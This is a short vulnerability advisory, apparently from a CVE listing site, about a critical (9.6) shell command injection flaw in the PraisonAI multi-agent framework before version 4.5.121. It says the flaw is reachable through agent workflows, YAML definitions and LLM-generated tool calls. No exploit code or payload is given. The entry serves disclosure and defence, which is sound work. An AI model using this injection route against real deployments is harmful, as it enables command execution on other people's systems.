PraisonAI is a multi-agent teams system. Prior to 4.5.121, the execute_command function and workflow shell execution are exposed to user-controlled input via agent workflows, YAML definitions, and LLM-generated tool calls, allowing attackers to inject arbitrary shell commands through shell metacharacters. This vulnerability is fixed in 4.5.121.
Source : NVD
## 9.6
Score
Published April 9, 2026
Severity CRITICAL
CNA Score 9.6
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
praisonai
Sources
NVD
pip Severity CRITICAL H
2026-04-09
Published